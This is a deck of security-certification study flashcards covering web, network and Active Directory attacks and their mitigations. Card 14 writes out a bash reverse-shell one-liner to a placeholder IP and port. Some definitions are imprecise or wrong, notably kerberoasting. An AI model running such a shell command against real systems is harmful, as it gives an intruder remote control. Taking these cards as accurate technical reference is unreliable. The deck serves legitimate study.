ATTACKS Flashcards

1
Q

Elicitation attack

A

obtaining information without directly asking for it

2
Q

Spear Phishing

A

targets specific individuals or groups within an org

3
Q

Reflected XSS

A

input sanitization (< >…)

4
Q

SQL Injection Stacked

A

parameterized queries

5
Q

DOM XSS

A

input sanitization (< > …)

6
Q

Local File Inclusion

A

sandbox req

7
Q

Command Injection

A

sandbox req

8
Q

SQL Injection Union

A

Parameterized queries

9
Q

SQL Injection ERROR

A

parameterized queries

10
Q

Remote File Inclusion

A

Sandbox

11
Q

Command injection

A

input sanitization $

12
Q

URL Redirect

A

prevent external calls

13
Q

Zigbee

A

IoT

internet of things

Zigbee is a wireless technology developed as an open global standard to address the unique needs of low-cost, low-power wireless IoT networks.

14
Q

Reverse Shell

A

bash -i >& /dev/tcp/[dest ip]/[port] 0>&1

15
Q

Point in Time Assessment

A

Compliance-based & Goals-based assessments.

16
Q

Man in the Middle

A
ARP Spoofing
Replay
Relay
SSL Stripping
Downgrade
17
Q

Invalidated Redirect

A

a web application accepts untrusted input in such a way that it causes a visitor to be redirected to another site.

18
Q

Session Hijacking

A

Session hijacking is used to steal session IDs: malicious code is installed on the website of a client, and then the session cookie is stolen.

19
Q

Four types of vulnerability assessments:

A

Active
Passive
Internal
External

20
Q

De Authentication

A

kick devices off router forcing them to re-connect

21
Q

ret2libc

A

privilege escalation inside Linux

buffer overrun exploit

22
Q

kerberoasting

A

a password-cracking attack in which credentials are stolen from memory and cracked offline

23
Q

VLAN double-tag

A

802.1Q